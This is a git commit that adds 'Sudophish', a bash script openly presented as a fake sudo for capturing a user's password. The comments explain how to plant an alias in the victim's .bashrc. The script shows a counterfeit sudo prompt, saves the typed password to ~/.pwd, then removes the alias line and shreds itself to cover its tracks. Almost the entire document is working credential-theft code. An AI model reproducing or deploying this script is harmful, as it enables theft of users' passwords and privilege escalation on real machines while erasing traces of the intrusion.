commit 2aacb2c46f7e2019c6a9d224d9ac9774a2c3ecb8 parent bf15b67018827a58fa3c9fb5034c6f6c8cdbb408 Author: MichaelDim02 <31562759+MichaelDim02@users.noreply.github.com> Date: Thu, 8 Jul 2021 11:25:11 +0300 Add files via upload Diffstat:
| A | sp.sh | | | 45 | +++++++++++++++++++++++++++++++++++++++++++++ |
1 file changed, 45 insertions(+), 0 deletions(-)
diff --git a/sp.sh b/sp.sh @@ -0,0 +1,45 @@ +#!/bin/bash + +# Sudophish +# +# A fake sudo to get a user's password +# By Michael C. Dim - mk@mcdim.xyz + +# 1. Add this line to *THE END* of the user's +# .bashrc or .zshrc or .mkshrc etc. : +# +# alias sudo="~/.sp.sh; sudo" +# +# 2. Put this script in the user's home +# directory as ~/.sp.sh +# +# 3. The password will be stored in ~/.pwd +# +# 4. This script and the last .bashrc line +# will self-destruct and be shredded. + +shellfile=".bashrc" +echo -n '[sudo] password for '$USER': ' +read -s password +echo "" + +# Comment the following line if the user +# does not need a password to use sudo +echo "Password is wrong, please try again" + +# Save the password +echo "$password" > ~/.pwd + +# Shred the line +dellastline() { + cp "$shellfile" "$shellfile".tmp + sed '$d' "$shellfile".tmp > "$shellfile" + shred -fu "$shellfile".tmp +} + +dellastline +echo "00000000000000000000000000" >> "$shellfile" +dellastline + +# Self-destruct +shred -fu "$0"